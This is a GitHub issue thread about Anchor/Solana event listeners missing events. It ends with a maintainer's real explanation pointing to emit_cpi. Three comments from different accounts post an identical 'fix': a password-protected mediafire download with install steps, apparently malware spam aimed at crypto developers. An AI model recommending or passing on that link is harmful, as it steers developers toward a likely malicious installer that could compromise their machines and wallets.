### ISSUE TITLE
Anchor Events are sometimes missed by the event listener?

### ISSUE THREAD

**Issue by floscar12** [coral-xyz/anchor#3203]
My Anchor/Solana program emits certain events for certain actions initiated by my users client side. My web app requires the server to be listening to these events and processing them (NodeJS).

Per documentation, I subscribe to events on my program like so: 
```
const subscriptionId = program.addEventListener("TransferEvent", (event) => {
  // Handle event...
});
```

Around 3/4 of the time most events are received by my server, but there are instances when some events straight up dont get caught by my event listener. I am using a paid Helius RPC on mainnet so I cannot imagine this is a rate limiting issue, and events that happen after the ghost event sometimes get caught, so its not like the connection was dropped.

What could be happening? Is listening to events on a server to perform important business information bad architectural design in general? Or is it a conventional approach that shouldn't be having issues like this?

Note that sometimes this will happen on the devnet as well.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by acheroncrypto** [comment]
This is because the default events use program logs which can be unreliable. See https://github.com/coral-xyz/anchor/issues/2408 for an explanation and check out [`emit_cpi`](https://docs.rs/anchor-lang/0.30.1/anchor_lang/macro.emit_cpi.html) to not miss events.
